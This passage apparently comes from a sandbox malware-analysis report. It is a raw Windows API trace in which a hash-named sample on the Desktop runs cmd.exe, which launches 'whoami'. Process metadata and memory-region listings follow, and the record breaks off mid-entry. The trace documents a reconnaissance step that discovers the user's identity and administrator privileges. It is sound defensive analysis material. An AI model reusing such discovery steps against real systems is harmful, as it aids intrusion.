(_String1="whoami", _String2="PATH") returned 7 [0231.799] _wcsicmp (_String1="whoami", _String2="GOTO") returned 16 [0231.799] _wcsicmp (_String1="whoami", _String2="SHIFT") returned 4 [0231.799] _wcsicmp (_String1="whoami", _String2="CLS") returned 20 [0231.799] _wcsicmp (_String1="whoami", _String2="CALL") returned 20 [0231.799] _wcsicmp (_String1="whoami", _String2="VERIFY") returned 1 [0231.799] _wcsicmp (_String1="whoami", _String2="VER") returned 1 [0231.799] _wcsicmp (_String1="whoami", _String2="VOL") returned 1 [0231.799] _wcsicmp (_String1="whoami", _String2="EXIT") returned 18 [0231.799] _wcsicmp (_String1="whoami", _String2="SETLOCAL") returned 4 [0231.799] _wcsicmp (_String1="whoami", _String2="ENDLOCAL") returned 18 [0231.799] _wcsicmp (_String1="whoami", _String2="TITLE") returned 3 [0231.799] _wcsicmp (_String1="whoami", _String2="START") returned 4 [0231.799] _wcsicmp (_String1="whoami", _String2="DPATH") returned 19 [0231.799] _wcsicmp (_String1="whoami", _String2="KEYS") returned 12 [0231.799] _wcsicmp (_String1="whoami", _String2="MOVE") returned 10 [0231.799] _wcsicmp (_String1="whoami", _String2="PUSHD") returned 7 [0231.799] _wcsicmp (_String1="whoami", _String2="POPD") returned 7 [0231.799] _wcsicmp (_String1="whoami", _String2="ASSOC") returned 22 [0231.799] _wcsicmp (_String1="whoami", _String2="FTYPE") returned 17 [0231.799] _wcsicmp (_String1="whoami", _String2="BREAK") returned 21 [0231.799] _wcsicmp (_String1="whoami", _String2="COLOR") returned 20 [0231.799] _wcsicmp (_String1="whoami", _String2="MKLINK") returned 10 [0231.799] _wcsicmp (_String1="whoami", _String2="FOR") returned 17 [0231.799] _wcsicmp (_String1="whoami", _String2="IF") returned 14 [0231.799] _wcsicmp (_String1="whoami", _String2="REM") returned 5 [0231.800] GetProcessHeap () returned 0x440000 [0231.800] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x44aba0 [0231.800] GetProcessHeap () returned 0x440000 [0231.800] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1a) returned 0x447288 [0231.800] _wcsnicmp (_String1="whoa", _String2="cmd ", _MaxCount=0x4) returned 20 [0231.801] GetProcessHeap () returned 0x440000 [0231.801] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x418) returned 0x44adb8 [0231.801] SetErrorMode (uMode=0x0) returned 0x8003 [0231.801] SetErrorMode (uMode=0x1) returned 0x0 [0231.801] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x44adc0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0231.801] SetErrorMode (uMode=0x8003) returned 0x1 [0231.801] GetProcessHeap () returned 0x440000 [0231.801] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x44adb8, Size=0x52) returned 0x44adb8 [0231.801] GetProcessHeap () returned 0x440000 [0231.801] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x44adb8) returned 0x52 [0231.801] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0231.801] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0231.801] GetProcessHeap () returned 0x440000 [0231.801] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x110) returned 0x44ae18 [0231.801] GetProcessHeap () returned 0x440000 [0231.801] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x218) returned 0x44af30 [0231.809] GetProcessHeap () returned 0x440000 [0231.809] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x44af30, Size=0x112) returned 0x44af30 [0231.809] GetProcessHeap () returned 0x440000 [0231.809] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x44af30) returned 0x112 [0231.809] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0231.809] GetProcessHeap () returned 0x440000 [0231.809] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe0) returned 0x44b050 [0231.811] GetProcessHeap () returned 0x440000 [0231.811] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x44b050, Size=0x76) returned 0x44b050 [0231.811] GetProcessHeap () returned 0x440000 [0231.811] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x44b050) returned 0x76 [0231.811] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.812] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\whoami.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0231.812] GetLastError () returned 0x2 [0231.812] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.812] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\whoami.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x44b0d0 [0231.813] GetProcessHeap () returned 0x440000 [0231.813] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x14) returned 0x4478c8 [0231.813] FindClose (in: hFindFile=0x44b0d0 | out: hFindFile=0x44b0d0) returned 1 [0231.813] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\whoami.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0231.813] GetLastError () returned 0x2 [0231.813] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\whoami.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x44b0d0 [0231.813] GetProcessHeap () returned 0x440000 [0231.813] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4478c8, Size=0x4) returned 0x447eb0 [0231.813] FindClose (in: hFindFile=0x44b0d0 | out: hFindFile=0x44b0d0) returned 1 [0231.813] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0231.813] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0231.813] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0231.817] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0231.817] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0231.817] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x17c, hStdOutput=0x180, hStdError=0x184)) [0231.817] GetProcessHeap () returned 0x440000 [0231.817] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x18) returned 0x447888 [0231.817] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0231.817] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0231.817] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0231.817] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0231.817] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0231.817] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0231.818] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0231.819] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0231.819] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0231.819] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0231.819] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0231.819] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0231.819] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0231.819] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0231.819] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0231.819] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0231.819] GetProcessHeap () returned 0x440000 [0231.819] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x447888) returned 1 [0231.819] GetProcessHeap () returned 0x440000 [0231.819] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa) returned 0x44b0d0 [0231.819] lstrcmpW (lpString1="\\whoami.exe", lpString2="\\XCOPY.EXE") returned -1 [0231.823] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\whoami.exe", lpCommandLine="whoami ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="whoami ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="whoami ", lpProcessInformation=0x19f6fc*(hProcess=0xa0, hThread=0x9c, dwProcessId=0xc98, dwThreadId=0x43c)) returned 1 [0232.457] CloseHandle (hObject=0x9c) returned 1 [0232.457] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0232.457] GetProcessHeap () returned 0x440000 [0232.457] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x449e60) returned 1 [0232.457] GetEnvironmentStringsW () returned 0x449e60* [0232.458] GetProcessHeap () returned 0x440000 [0232.458] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa76) returned 0x447fe8 [0232.458] FreeEnvironmentStringsA (penv="=") returned 1 [0232.458] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0234.994] GetExitCodeProcess (in: hProcess=0xa0, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x0) returned 1 [0234.995] CloseHandle (hObject=0xa0) returned 1 [0234.995] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000000") returned 8 [0234.996] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0234.996] GetProcessHeap () returned 0x440000 [0234.996] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x447fe8) returned 1 [0234.996] GetEnvironmentStringsW () returned 0x447fe8* [0234.996] GetProcessHeap () returned 0x440000 [0234.996] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa9c) returned 0x458840 [0234.997] FreeEnvironmentStringsA (penv="=") returned 1 [0234.997] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0234.997] GetProcessHeap () returned 0x440000 [0234.997] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x458840) returned 1 [0234.997] GetEnvironmentStringsW () returned 0x447fe8* [0234.997] GetProcessHeap () returned 0x440000 [0234.997] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa9c) returned 0x458840 [0234.998] FreeEnvironmentStringsA (penv="=") returned 1 [0234.998] GetProcessHeap () returned 0x440000 [0234.998] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44b0d0) returned 1 [0234.998] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0234.998] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0235.001] _close (_FileHandle=3) returned 0 [0235.001] _get_osfhandle (_FileHandle=1) returned 0x180 [0235.002] SetConsoleMode (hConsoleHandle=0x180, dwMode=0x0) returned 0 [0235.002] _get_osfhandle (_FileHandle=1) returned 0x180 [0235.002] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0235.002] _get_osfhandle (_FileHandle=0) returned 0x17c [0235.002] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0235.002] GetConsoleOutputCP () returned 0x1b5 [0235.012] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0235.012] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.014] exit (_Code=0) Thread: id = 429 os_tid = 0x11e8 Process: id = "88" image_name = "whoami.exe" filename = "c:\\windows\\syswow64\\whoami.exe" page_root = "0x2c80d000" os_pid = "0xc98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "87" os_parent_pid = "0xd24" cmd_line = "whoami " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6171 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6172 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6173 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6174 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6175 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6176 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 6177 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 6178 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 6179 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6180 start_va = 0x8d0000 end_va = 0x8e0fff monitored = 0 entry_point = 0x8db830 region_type = mapped_file name = "whoami.exe" filename = "\\Windows\\SysWOW64\\whoami.exe" (normalized: "c:\\windows\\syswow64\\whoami.exe") Region: id = 6181 start_va = 0x8f0000 end_va = 0x48effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 6182 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6183 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6184 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6185 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6186 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 6187 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6188 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 6189 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6190 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6191 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6192 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6193 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6194 start_va = 0x400000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6195 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6196 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6197 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6198 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6199 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6200 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6201 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6202 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6203 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6204 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6205 start_va = 0x4d0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 6206 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6207 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6208 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6209 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6210 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6211 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6212 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6213 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6214 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6215 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6216 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 6217 start_va = 0x6cd90000 end_va = 0x6cd9ffff monitored = 0 entry_point = 0x6cd934d0 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 6218 start_va = 0x6cd80000 end_va = 0x6cd89fff monitored = 0 entry_point = 0x6cd828d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6219 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6220 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6221 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 6222 start_va = 0x6ccb0000 end_va = 0x6cce0fff monitored = 0 entry_point = 0x6ccbc0c0 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\SysWOW64\\authz.dll" (normalized: "c:\\windows\\syswow64\\authz.dll") Region: id = 6223 start_va = 0x610000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6224 start_va = 0x610000 end_va = 0x797fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6225 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 6226 start_va = 0x7d0000 end_va = 0x7f9fff monitored = 0 entry_point = 0x7d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6227 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6228 start_va = 0x48f0000 end_va = 0x4a70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048f0000" filename = "" Region: id = 6229 start_va = 0x4a80000 end_va = 0x5e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a80000" filename = "" Region: id = 6230 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6231 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6232 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "whoami.exe.mui" filename = 